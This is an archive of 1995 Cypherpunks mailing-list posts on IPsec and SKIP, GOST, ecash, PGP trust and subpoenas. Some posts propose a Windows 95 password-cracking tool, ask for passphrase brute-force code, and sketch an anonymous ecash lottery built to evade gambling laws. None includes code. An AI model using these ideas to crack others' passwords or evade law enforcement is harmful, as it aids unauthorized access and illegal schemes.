to be doing so soon as well. All other hardware manufacturers will be
running the normal IPSEC too. I suspect Sun is going to have a very
tough sell.

Perry





From vznuri at netcom.com  Wed Nov 29 13:03:55 1995
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Thu, 30 Nov 1995 05:03:55 +0800
Subject: break microsoft!!!
Message-ID: <199511291949.LAA04349@netcom13.netcom.com>


re: the recent message that windows 95 has weak password encryption
due to a 32 bit random seed sent to RC4--

this seems like another EXCELLENT opportunity for some major 
cypherpunks press coverage and feather-in-the-cap accolades.

remember, the last break of the Netscape RC4 algorithm (or was it
MD5?) got front page NYT coverage and reverberated throughout the
entire media.

a "cypherpunk" accomplishing the same thing for Microsoft would 
potentially get *major* notice.

I imagine a short .exe file that when run on the proper computer
prints out passwords as it cracks them. this would get the
attention of a LOT of people.


I have the MS C++ compiler, and if someone could discuss the difficulty
of writing this proposed "exe" file, the rough time required to break
the keys, and other considerations (physical access to server computer
required?)  and maybe point to code pieces on the
net (RC4 etc.) to pull it off, I might start the effort myself.







From stewarts at ix.netcom.com  Wed Nov 29 13:13:16 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 30 Nov 1995 05:13:16 +0800
Subject: The future will be easy to use
Message-ID: <199511292001.MAA16554@ix6.ix.netcom.com>


At 03:30 PM 11/28/95 EST, Carl Ellison <cme at TIS.COM> wrote:

>BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
>is that I trust that key (by personal meeting, by attribution, by message
>association, ...).  A signed attribute record would let me record that
>information for myself as well as for others.

That would be a useful feature, even if it's just an unstructured text file.
There is a way to do it now, though it's inefficient and hokey -
create multiple key-signing keys, with name fields indicating the attribute,
sign them with your main key, and use the appropriate one of them to
sign keys for people.  For instance, I have a key named
"Bill Stewart Unauthenticated Pseudonym Signing Key <stewarts at ix.netcom.com>"
which I use to sign keys of significantly lower trust than my normal key;
you could do similar things for higher-quality certification.
This does increase the depth of the web-of-trust required, which is less
of a problem for low-trust keys than for keys you actually care about :-)
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From weidai at eskimo.com  Wed Nov 29 13:17:59 1995
From: weidai at eskimo.com (Wei Dai)
Date: Thu, 30 Nov 1995 05:17:59 +0800
Subject: Elliptic curves, patent status?
In-Reply-To: <199511290717.XAA29808@blob.best.net>
Message-ID: <Pine.SUN.3.91.951129120448.15920A-100000@eskimo.com>


On Mon, 27 Nov 1995, James A. Donald wrote:

> > [are there patents that cover all public key cryptography?]
>
> No, but RSA will litigate you with the objective of
> inflicting extravagant legal costs regardless.

RSADSI no longer owns the Stanford patents (Hellman-Merkel, 
Diffie-Hellman) which they used to claim covered all public key 
cryptography.  Those patents now belong to Cylink, who seems to be less 
litigious.

Wei Dai





From llurch at networking.stanford.edu  Wed Nov 29 13:29:43 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Thu, 30 Nov 1995 05:29:43 +0800
Subject: Code to brute-force PGP passphrase?
Message-ID: <Pine.ULT.3.91.951129123917.17268A-100000@Networking.Stanford.EDU>


-----BEGIN PGP SIGNED MESSAGE-----

I have an old, forgotten PGP key for which I would like to issue a
revocation certificate (or maybe I stole somebody else's with an identical
name; who could tell?). I can put the key on a Mac, PC, or UNIX machine
(various flavors). I think I have a pretty good idea what the middle of
the passphrase contains, so I'd guess there are only about 2,000
possibilities to be explored. 

Anybody have code for any platform for cracking this? Alternatively, I
could just give you the key and wait for the answer. 

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLzGmI3DXUbM57SdAQE8NAP9EKVkxVzsTPHQ0NcJJgU4aor8BQbjN2a5
OqNAkpeNoZOcn5NcqGBMjI6mVQbgVjnzDOdoDWngGmWbtruFcFjE1IM8iK/wScah
Caqo7SuKQqUMXB8mAC5pVYmdavJrOX4WPcl6nT2MkJTvnJe7YgiCMWIdm+4XCPZ/
YybyYhWf7XA=
=W5H8
-----END PGP SIGNATURE-----





From attila at primenet.com  Wed Nov 29 13:33:01 1995
From: attila at primenet.com (attila)
Date: Thu, 30 Nov 1995 05:33:01 +0800
Subject: The future will be easy to use
In-Reply-To: <199511291555.KAA02851@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129205059.29011B-100000@usr2.primenet.com>


On Wed, 29 Nov 1995, Perry E. Metzger wrote:

> 
> attila writes:
> > 
> >    what about the Sun release announced today? --it is fully functional
> > with DES and 3xDES, DH negotiation, etc. and is coded for either sun 4.1.3
> > or gcc compilers?  Check out http://skip.incog.com.  source to the SKIP
> > key management and IP layer encryption package for SunOs 4.x. 
> 
> Ah, yes. The non-standard from Sun.
> 
> It doesn't do D-H negotiation, by the way. It uses something I'd call
> inferior. Read the flames in ipsec and ipsec-dev for details.
> 
> .pm
> 
    figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
the power to make something happen on the high-power workstations, and the
fact they are making a portable package available in source code is
farther than anyone else has gone. 

    my experience over the last 15 years with Sun is that they do listen 
to outside "noise" and will move forward.  I for one will be contacting 
my Catalyst rep and the software develop group; the time has passed when 
you could get Andy, Bill, or Scott on the squawker.  I did complain to 
Scott about Catalyst changes --I did get a nice letter back, but I doubt 
it was authored by Scott.  Andy resigned last year, and I have not heard 
from Bill for years.

   other than the inferior method v. DH, is there anything else missing; 
I will probably pull the code package of the developers' access machine 
before the week is out just to take a look.






From perry at piermont.com  Wed Nov 29 13:53:39 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 30 Nov 1995 05:53:39 +0800
Subject: The future will be easy to use
In-Reply-To: <Pine.BSD.3.91.951129205059.29011B-100000@usr2.primenet.com>
Message-ID: <199511292128.QAA03706@jekyll.piermont.com>



attila writes:
>     figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
> the power to make something happen on the high-power workstations, and the
> fact they are making a portable package available in source code is
> farther than anyone else has gone. 

Unfortunately, an internetworking protocol used by only one vendor
gets nowhere.

>     my experience over the last 15 years with Sun is that they do listen 
> to outside "noise" and will move forward.

I doubt it. Ashar Aziz and company at Sun are pretty much
ego-committed to SKIP. Their group might not have nearly as much
justification for its existance without it. That probably makes them
reluctant to go in the right direction.

>    other than the inferior method v. DH, is there anything else missing; 
> I will probably pull the code package of the developers' access machine 
> before the week is out just to take a look.

SKIP is really very alien from the direction most of IPSEC is
taking. It sacrifices a lot of functionality for the perceived benefit
of being able to send an encrypted packet to a host "without prior
negotiation". Unfortunately, that benefit turns out to be a mirage
because in any real network you would need to do a certificate lookup
in order to actually decrypt the packet, at which point you've lost
any advantage. SKIP requires all sorts of hooks into the ESP/AH packet
formats which makes it essentially incompatbile with ESP/AH
implementations. SKIP uses long term keys which could really hurt if
they were compromised. SKIP doesn't do perfect forward secrecy. I
could go on and on.

Ashar keeps answering every criticism with "well, you COULD do X in
SKIP if you just hung this kludge onto it, but of course we hope most
people would never do that".

I started with a lot for respect for the guys and lost most of it
through time. Ah, well.

Perry





From llurch at networking.stanford.edu  Wed Nov 29 14:01:10 1995
From: llurch at networking.stanford.edu (Rich Graves)
Date: Thu, 30 Nov 1995 06:01:10 +0800
Subject: break microsoft!!!
In-Reply-To: <199511291949.LAA04349@netcom13.netcom.com>
Message-ID: <Pine.ULT.3.91.951129132555.17268F-100000@Networking.Stanford.EDU>


Be careful not to sound too gleeful, lest you play into the evil nasty 
hacker stereotype. Keep the focus on the fact that real encryption is 
both possible and highly desired; the bad guys are lazy programmers and 
the US Government.

I have sent a pointer to the sci.crypt article to the win95netbugs list, 
which currently has eight Microsoft employees and nine major computer 
magazines on it. I might mention it to Microsoft's "technical people" 
when they drop by next week to address our networking concerns.

The answer, for anyone desiring one, is to turn off Win95's "multiple 
user profiles" features, turn off "encrypted password caching," and 
advertise the fact that Win95 is a totally insecure single-user OS, and 
will continue to be so as long as it uses the 1970's-vintage FAT file 
system. If real security is not available, the goal should be to 
eliminate the false sense of security that encourages people to leave 
sensitive files out in the open.

-rich





From jimbell at pacifier.com  Wed Nov 29 14:45:19 1995
From: jimbell at pacifier.com (jim bell)
Date: Thu, 30 Nov 1995 06:45:19 +0800
Subject: key for Alice as promised (not)
Message-ID: <m0tKuh9-0008zjC@pacifier.com>


>On Tue, 28 Nov 1995, Adam Hupp wrote:
>
>> >Can you imagine??  I'm simply not willing to fool myself into thinking 
>> >that I ahve security by posting a key and using PGP.
>> 
>> Unless you can post some proof that PGP is insecure, stop insisting it is.
>
>Hold on a minute.  Alice is, here, 100% correct.

no, he isn't.  He isn't even using a minimal effort to prevent spoofing, and
he's blaming this on the fact that some particular piece of software (for
example, PGP) isn't absolutely foolproof. 


>If I use PGP to read messages and there's a videocamera trained on the 
>keyboard, and other people have access to the machine, PGP is not 
>secure.  Similarly, if PGP is on a computer which other people may use 
>without my supervision, they can  monitor keystrokes, etc. and PGP is not 
>secure.

True but irrelevant.  This is especially true since the only purpose to
signing messages to a public area is to prevent spoofing.  If somebody does,
indeed, figure out how to break (say) a 1024-bit PGP key and "Alice" gets
spoofed, HE WILL KNOW because he will see a message with his signature that
HE KNOWS he didn't send.  At that point, he will at least be able to reduce
the number of spoofed messages to 1 before he alerts us that there is a
problem.  We won't necessarily know who to believe, of course, but we will
know that one of a number of this is probably true:

1  "Alice" is lying to us.   (by far the most likely.)

2.  Somebody actually has physical access to "Alice's" machine and is
actively using it to spoof messages.

3.  Somebody found out how to break 1024-bit PGP keys easily.  (Very
unlikely, of course.)
 

>A chain is only as strong as its weakest link; Alice recognizes this, and 
>makes no claim that PGP itself is the weak link. 

But "Alice" resists using ANY chain at all!

 






From attila at primenet.com  Wed Nov 29 14:55:12 1995
From: attila at primenet.com (attila)
Date: Thu, 30 Nov 1995 06:55:12 +0800
Subject: The future will be easy to use
In-Reply-To: <199511292128.QAA03706@jekyll.piermont.com>
Message-ID: <Pine.BSD.3.91.951129221922.23090B-100000@usr4.primenet.com>


   OK, I have not seen it (like I said, I will get it) or read ipsec.  

   However, despite the group ego, Sun _does_ listen and Sun does wish to 
be the leader. If the rest of ipsec group has a specific list, maybe it 
needs to presented higher up the pole.

   As fun as it might be to code it, you have enough on your plate with 
pgp alone. Sun's resources for a directed course are hard to beat; this 
is just another repeat of the first go around.  SKIP obviously will not 
fly outside of Sun without industry support and if it has long term keys 
and can be compromised, it will be a tough row to how.  time for a little 
pressure where it counts.

   the fact Sun released source indicates they are open enough to expect 
criticism.

	attila






From fluffy at shout.net  Wed Nov 29 14:56:03 1995
From: fluffy at shout.net (Chris Stillson)
Date: Thu, 30 Nov 1995 06:56:03 +0800
Subject: GOST for sale
Message-ID: <199511292216.QAA25781@duracef.shout.net>


What I wonder about is why anyone would use the Algorithm
that the NSA is probably best at breaking.  Breaking GOST was probably
their number one project for years, and I would suspect that they
have done it.

chris







From raph at c2.org  Wed Nov 29 15:10:28 1995
From: raph at c2.org (Raph Levien)
Date: Thu, 30 Nov 1995 07:10:28 +0800
Subject: Response to ping re: CJR
Message-ID: <199511292240.OAA09940@infinity.c2.org>


I just got a message on my answering machine from Sam Capino. He said
they are working on answer to my CJR. They had hoped to get it out by
now, but were set back by "the furlough." I had called him about a
week ago to check up on the status, but at the time only got his
answering machine.

Of course, the original 15 days have passed, but I'm perfectly willing
to let that slide since I'm not completely sure that the CJR was
submitted using exactly the right process.

Just thought you'd like to know.

Raph






From pete at loshin.com  Wed Nov 29 15:16:21 1995
From: pete at loshin.com (Pete Loshin)
Date: Thu, 30 Nov 1995 07:16:21 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABE83.A3A80240@ploshin.tiac.net>


Perry E. Metzger writes:
>attila writes:
>>figures. I'll give ipsec and ipsec-dev a look.  However, SUN does have
>>the power to make something happen on the high-power workstations, and the
>>fact they are making a portable package available in source code is
>>farther than anyone else has gone. 
>
>Unfortunately, an internetworking protocol used by only one vendor
>gets nowhere.

much other discussion ommitted...

I hate to quibble, but past experience may demonstrate this
to be inaccurate.  In particular, and most relevantly:

	NFS (Sun)
	SSL (Netscape)

Another internetworking protocol (IPX) gave Novell a good run.

The point is that a working implementation goes a long way for
people who want/need _something_ that works, NOW. Consider the
relative merits/success of S-HTTP and SSL.

ObCrypto: the POTP people are the Boston Internet Expo today and
tomorrow, and they have their "technical guy" who is supposed
to be answering questions. The nontechnical guy said they generate
random numbers using randomness taken from the text of the messages
being encrypted.

-pl
_Electronic Commerce_ (Charles River Media, available now)
pete at loshin.com






From acceso2 at diatel.upm.es  Wed Nov 29 15:31:22 1995
From: acceso2 at diatel.upm.es (Usuario Acceso2)
Date: Thu, 30 Nov 1995 07:31:22 +0800
Subject: Question on modular exponents
Message-ID: <230*/S=acceso2/OU=diatel/O=upm/PRMD=iris/ADMD=mensatex/C=es/@MHS>


Hi CP's:

I'd be pleased if someone explained me this ASAP:

How could I demonstrate that _ (g^a)^b (mod p) = g^{(a*b) mod q} mod p _
when g's order in Zp is q?

The same question remains for adition. I have the feeling the demonstration
must be similar.

Best.

Jaime






From dl at hplyot.obspm.fr  Wed Nov 29 15:36:41 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Thu, 30 Nov 1995 07:36:41 +0800
Subject: ecash casino
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <9511292318.AA27417@hplyot.obspm.fr>


sameer at c2.org writes:
 > 	Any enterprising cypherpunks in gambling-friendly
 > jurisdictions interested? I figure it would make ecash take off.. and
 > you'd get rich.
Good idea, I'd gladly provide (read sell ;-) know-how :-)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

DST Kaser Sose Panama Castro Khaddafi Ortega arrangements





From JMKELSEY at delphi.com  Wed Nov 29 15:49:53 1995
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Thu, 30 Nov 1995 07:49:53 +0800
Subject: GOST for sale
Message-ID: <01HY74DKD11A9IFJI3@delphi.com>


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Fri, 24 Nov 1995 03:43:25 +0100 (MET)
>From: Mats Bergstrom <asgaard at sos.sll.se>
>Subject: GOST for sale

>According to a short article in a Swedish newspaper (DN)
>with the title 'Spy Code of KGB can make computers safe',
>JETICO INC., located in Finland (Tammerfors), introduced
>a new crypto system on the world market last week. It's
>based on GOST, the Russian federal standard algorithm.
>This product, called BestCrypt, is implemented at least
>partly in hardware. Alledgedly it uses 'GOST 28147-89',
>whatever that stands for.

Hmmm.

>GOST is probably very secure - a huge keyspace (256 bits) and
>KGB would not have left a trapdoor for NSA to take advantage
>of, would they?

If this is the cipher I've seen, it's not overwhelmingly impressive,
though it may be OK.  I haven't ever made any serious attempt to
attack it, and I don't know anyone else who has.  Anyone have a
reference?

Basically, GOST is a balanced Feistel network (like DES), but its
F-function is much simpler.  Basically,
F(X,K) = Rotate_Left(S(X+K),11),
where S(t) denotes parallel application of eight 4:4 S-boxes.

Depending on the implementation, these S-boxes' contents could be
key-dependent and pseudorandom, or fixed.  Unfortunately small
random S-boxes are likely to have some weaknesses W.R.T.
differential cryptanalysis.  This can be true even when the S-boxes
are secret and key-derived--see Biham and Birkyov's paper in
Auscrypt '94 on a DES variant with variable S-boxes, for a quick
discussion of this.  And the security of this scheme is very much
going to depend upon the S-boxes used.  If the S-boxes are generated
at (pseudo)random from the key, I'd expect there to be some pretty
nasty weak key conditions that could occasionally come up.

On the other hand, GOST is defined with 32 rounds, so it may be hard
to find any useful differential or linear characteristics, even for
relatively bad S-box choices, that have high enough probability to
get through 29-31 rounds.  And it has a 256-bit key, so even if
someone determines some attack which recovers 160 bits of the key,
there are still 96 bits of key left to provide security.

The GOST key schedule is really simple, though it avoids the most
obvious kind of related key attack.  I wouldn't be surprised to see
some interesting related key attacks be possible.  This is
interesting because there is also a hash function based on GOST--I'd
be pretty reluctant to use this without a lot of analysis.

>The newspaper article ends:
>
>'The Finnish entrepreneurs asseverate that their
>Russian colleagues have never had anything to do
>with the KGB.'

I may be mistaken, but wasn't there some other internal organization
in the USSR that did cryptography?

>Mats

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey at delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLv0kkHx57Ag8goBAQFH3AP+JR1sEQCH0ANmNSDFhzpCZb4jn4uqq23v
PjZfFOrYc9SrD1xn+3azqfHFpiHIubfWzZ8u1aNEf4erAErbQLPAUOLPv17zhn//
6UEVKX4GhPqoLfou+wO38rF2DwWdeCjuQm2GgxuFpw5b0D4M3V1mv5ocLOoOMq2N
twdfxiMtO6Y=
=BOER
-----END PGP SIGNATURE-----





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 29 15:59:49 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 07:59:49 +0800
Subject: The future will be easy to use
Message-ID: <01HY84MS8LTC8WYXJI@mbcl.rutgers.edu>


From:	IN%"perry at piermont.com" 28-NOV-1995 13:34:33.55

Jonathan Zamick writes:
> I can't agree. The model of a successful enterprise includes feedback from
> different levels of participants.

This isn't an enterprise. The government is not a participant except
by their own desire to interfere.
---------
	One reason to incorporate a probable opponent into something is to see
what methods the opponent will likely use. For instance, their debating points
would be nice to know in advance (to the degree they aren't already); while
cyberpunks don't have much access to the mass media, that on the Net
(where a lot of the initial potential users are likely to be) is another
matter. Getting clues to their likely legal strategy may also be valuable.
	On the other hand, letting them know too much may be a problem... of
course, I'm _certain_ the NSA, etcetera get copies of this list.
	-Allen





From EALLENSMITH at ocelot.Rutgers.EDU  Wed Nov 29 16:16:29 1995
From: EALLENSMITH at ocelot.Rutgers.EDU (E. ALLEN SMITH)
Date: Thu, 30 Nov 1995 08:16:29 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <01HY84U9MG468WYXJI@mbcl.rutgers.edu>


From:	IN%"tcmay at got.net" 28-NOV-1995 20:15:30.64

The reason we speak in terms of physical volumes of "Adleman computers" is
to make concrete the way things scale. If the amount of Adleman computers
needed to factor, say, a 2000-digit modulus (or some reasonably equivalent
Hamiltonian cycle problem, such as the TSP) is "ten Pacific oceans full of
them running for 100 years," then one has a pretty clear feel for just how
futile it is to ask about "But what about if we apply MASSIVE
PARALLELISM?!?!"
------------
	Ah. My objection is probably from being too much of a purist in my own
area of science. I do tend to try to be quite careful in whatever I write to
use the correct terms (then explain them for those who've heard the incorrect
ones).

-------------
I don't worry much about factoring breakthroughs. And I don't mean minor
improvements, which keep occurring: I mean major breakthroughs which would
make factoring a 2000-decimal-digit number "easy."

Practically speaking, snarfing private keys is a helluva lot easier, for
many reasons.
--------------
	Umm... it's easier for each one. But the effort in question adds up.
Ultimately, for an agency (NSA, CIA, etcetera) wanting to do a lot of such
unencryptings, coming up with a factoring method is the most efficient way to
go. Fortunately, science doesn't work very well with security classifications
(unlike engineering, which is what most military classified "science" is from
what I know).
	-Allen





From iagoldbe at calum.csclub.uwaterloo.ca  Wed Nov 29 16:38:24 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 30 Nov 1995 08:38:24 +0800
Subject: ecash protocol: Part 1
In-Reply-To: <199511212146.NAA11456@cory.EECS.Berkeley.EDU>
Message-ID: <49it0e$r4i@calum.csclub.uwaterloo.ca>


In article <199511212146.NAA11456 at cory.EECS.Berkeley.EDU>,
Ian Goldberg  <iang at cory.EECS.Berkeley.EDU> wrote:
>I've managed to decipher a useful bit of the first message sent from
>the shop to the payer.  It's the Payment Request, and contains the following
>information:
>
>o Header identifying packet as Payment Request
>o The integer 4
>o The payment amount, in cents
>o The time (seconds since 1970)
>o The integer 79
>o The name of the shop (payee)
>o A description of the item being paid for
>o An empty string
>o The integer 0
>o End of Record marker
>
>I don't know what the 4, 79, empty string, and 0 are for.  I assume one
>of them (probably the 4) is some indication of currency (US cents).

I now know what the empty string and the 0 are for.  In the event that
a Payment Request is sent out-of-band (in an application/ecash message,
for example), the string and integer are the hostname and port (commonly
1100) to which the payer should connect in order to send a payment.

   - Ian "Wait for it..."





From dmandl at bear.com  Thu Nov 30 08:55:17 1995
From: dmandl at bear.com (David Mandl)
Date: Thu, 30 Nov 95 08:55:17 PST
Subject: "Got a subpoena?"
In-Reply-To: <199511301606.IAA17493@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951130113015.132b-100000@goya>


On Thu, 30 Nov 1995, sameer wrote:

> 	Community ConneXion will comply with all properly formed court
> orders and subpeonas. We will *not* cooperate without court
> intervention. (I.e. Mr. FBI calls up and says "can you help us find
> this suspect"? I respond "got a subpoena?")

But it's not quite that simple, Sameer.  Don't underestimate the more
subtle forms of non-cooperation you can engage in.

To use the most obvious example, different remailer operators turn
different levels of logging on.  So one operator will say "Yes, I am
obligated to fully comply with your subpoena, officer.  Here are the
full logs for the last six months."  And another will say "Yes, I am
obligated to fully comply with your subpoena, officer.  However, I
keep no logs at all of the mail sent through my remailer.  Drag, huh?"

Being the eternal pessimist, I once again point out that the
government will try to stop cryptoanarchy any way they can.  Their
main tool is the law, and they WILL use it eventually when all else
fails.  Personally, I would play it safe by operating on the
assumption that basically EVERYTHING will be illegal eventually and
"finessing" laws will become more important.  In short, they WILL have
a subpoena--then what?

Of course, I personally would never do anything illegal.

   --Dave.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl at bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************





From jamesd at echeque.com  Thu Nov 30 08:55:52 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 08:55:52 PST
Subject: Netscape gives in to key escrow
Message-ID: <199511301654.IAA26162@blob.best.net>


At 12:55 AM 11/30/95 -0800, Jeff Weinstein wrote:
> All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes. 

Then we would like to hear Jim "clarify" his position.

Absent such clarification, we must assume he considers the
press reports of what he said to be reasonably accurate.

>  I don't want to go down in history as a facilitator of the totalitarian
> state, and I don't think anyone else here does either. 

Most of the major players have taken a position overtly opposed to
GAK (whilst leaving themselves some wriggle room, should
the heat get too severe).

What is netscape's position?


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Thu Nov 30 09:00:47 1995
From: jamesd at echeque.com (James A. Donald)
Date: Thu, 30 Nov 95 09:00:47 PST
Subject: cypherpunks at ietf
Message-ID: <199511301700.JAA29522@blob.best.net>


> OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
> SEARCH ON THE WEB.
>
> [...]
>
> AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
> THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

Gee:  Someone who has not learnt to use the caps key on his computer
cannot do accurate searches, so will everyone else please get off
the net.

>
> [...]
>
> BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
> PLACING ON THE WEB.

Pleasant comic relief.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From anon-remailer at utopia.hacktic.nl  Wed Nov 29 17:09:32 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Thu, 30 Nov 1995 09:09:32 +0800
Subject: Elliptic curves, patent status?
In-Reply-To: <199511290717.XAA29808@blob.best.net>
Message-ID: <199511300051.BAA26198@utopia.hacktic.nl>


Wei Dai (weidai at eskimo.com) wrote:
> On Mon, 27 Nov 1995, James A. Donald wrote:
>
> > > [are there patents that cover all public key cryptography?]
> >
> > No, but RSA will litigate you with the objective of
> > inflicting extravagant legal costs regardless.
>
> RSADSI no longer owns the Stanford patents (Hellman-Merkel, 
> Diffie-Hellman) which they used to claim covered all public key 
> cryptography.  Those patents now belong to Cylink, who seems to be less 
> litigious.

Especially considering that they might lose the patents in a court case
next month.





From iagoldbe at calum.csclub.uwaterloo.ca  Wed Nov 29 17:46:39 1995
From: iagoldbe at calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Thu, 30 Nov 1995 09:46:39 +0800
Subject: ecash lottery (Was: ecash casino)
In-Reply-To: <199511291640.IAA28114@infinity.c2.org>
Message-ID: <49j0sq$a69@calum.csclub.uwaterloo.ca>


In article <199511291640.IAA28114 at infinity.c2.org>,
sameer  <sameer at c2.org> wrote:
>	Any enterprising cypherpunks in gambling-friendly
>jurisdictions interested? I figure it would make ecash take off.. and
>you'd get rich.
>
Does anyone know what jurisdictions allow lotteries/gambling?

Here's an off-the-cuff idea:

[Disclaimer: The following post is a gedanken experiment.  It should not
		be interpreted as condoning or encouraging anyone to break any
		laws, no matter how stupid the laws are.]

Anonymous email lotteries:
Advertise the lottery (and include a public PGP key) through some remailer
in one of the above jurisdictions.  Use a remailer that allows pseudonymous
replies.  In the announcement, include a secure hash of the next drawing's
winning number (appended to appropriate amounts of random noise).  Advertise
to a mailing list or a newsgroup, like alt.anonymous.lotteries.announce.

People pay by sending:
{
A payment made out to "@" (the ecash wildcard)
Their choice of lottery ticket number
A PGP Public key
}
encrypted with the lottery's public key, to the remailer address.

A lottery consists simply of displaying the winning number and random
noise, whose hash was previously posted (so the participants know
you're not cheating).

Now: there's likely no Web-of-Trust to the various PGP keys involved,
so the lottery's Reputation will have to be built up.  A good way to
do this is to have smaller prizes being won fairly often (e.g. by matching
the last digit/few bits), so that it's obvious the lottery is not just
collecting money without awarding prizes.

The lottery pays out by replying to the winner's pseudonymous messages
with their payment (made out to "@"), encrypted with their PGP key.

There can be other variants on the lottery.  For example, the participant
whose ticket is _closest_ to the winning number wins all the money
in the pot (minus a cut for the house).  A problem with this, and various
other forms of the lottery, is that it's hard for the lottery to prove
that it's not cheating (either in the amount of money it took in, or
that the losers of the lottery actually lost, etc.).

In this model of payment, no participant knows anything about any other
participant except a remailer's Reply-Block, and a PGP public key.
However, using the features of ecash (from what I know of how it works,
which isn't all that much (yet)), a payer can, in collaboration with the
bank, identify the payee.  This may be undesirable for the lottery operator
and/or the participants.

If (when) details of ecash are published (by Digicash or by someone else),
it would likely be easier to work out how to achieve all-way anonymity with
ecash.  I seem to recall some mention of how this would be done here
a while ago, and Lucky said he was going (before he started working for
them) "to write some scripts that will lay the groundwork for some of the
more unusual applications of Ecash".

Follow-up thought:
The lottery operator, instead of depositing the coins he receives
from the participants, stockpiles them, and forwards them on to the
winner(s).  If a participant complains to the bank, and the bank traces
his payment, it is likely to merely identify another participant
(who is not doing anything illegal, AFAIK (IANAL; it's illegal to _run_
this sort of thing inside the US, not to _play_ it, right?)), and the
lottery owner can even claim he is merely a participant, in the chance event
that he _is_ the one identified, and he happens to be in the US...

As far as I can tell, then, with this sort of method, the only way the
lottery operator could be caught (technically; he could be caught in
non-technical ways, say by being overheard bragging about it (Don't laugh;
it's been done.)) is by having the remailer (or remailer chain) compromised.

So; is there a problem with the implementation outlined above?  If it were
implemented, would people play it?

   - Ian "Still not sure he wants to get an ecash account"





From frantz at netcom.com  Wed Nov 29 18:33:15 1995
From: frantz at netcom.com (Bill Frantz)
Date: Thu, 30 Nov 1995 10:33:15 +0800
Subject: The future will be easy to use
Message-ID: <199511290808.AAA14767@netcom2.netcom.com>


At 15:30 11/28/95 -0500, Carl Ellison wrote:
>BTW -- PGP currently lacks a way for me to note, when I sign a key, how it
>is that I trust that key (by personal meeting, by attribution, by message
>association, ...).  A signed attribute record would let me record that
>information for myself as well as for others.

There is more to this problem than how it is that I trust the key.  There
is also what I trust it for.  I just added a key to my key ring that I will
use for sending confidental data to a client site.  I trust that no one can
access the secret key who is not also inside their firewall.  However, the
key is on a multi-user system, so I do not trust that it is accessable to
only one person.  Since the data I intend to send will be publicly
available inside the firewall, I don't have to trust more than the
firewall.

It is hard to see how to record the information about how much I trust the
receipent's systems security.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From eay at mincom.oz.au  Wed Nov 29 18:34:37 1995
From: eay at mincom.oz.au (Eric Young)
Date: Thu, 30 Nov 1995 10:34:37 +0800
Subject: The future will be easy to use
In-Reply-To: <v02120d02ace0fcab0df8@[157.22.240.13]>
Message-ID: <Pine.SOL.3.91.951129104350.18458D-100000@orb>


On Tue, 28 Nov 1995, Jonathan Zamick wrote:
> Returning to the original topic though, do we want to get a smaller list
> together to spec out some ideas for the project that was discussed? A
> simple, transparent, tool which would allow people to use strong encryption
> without having to think about it?

It should be worth noting that I hope to put out the next version of
SSLeay in less that a week (I hope, depending on how many nights I don't
sleep :-) and it should include a 'demo' CA application. It will probably
only use simple text indexes and directorys for storage but I intend it to
be able to generate CRL and process certificate requests.  The only
question is do I put in support to ouput the certificate using a
netscape/verisign compatable format :-).  If nothing else, this should be
a good starting point for adding a nice GUI front end and a real database
backend.  The application will be mostly a front-end to the SSLeay library
so if I finish most of my documentation by then, others should be able to
write a real CA application. 

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay at mincom.oz.au    | more followups than the message contents :-)






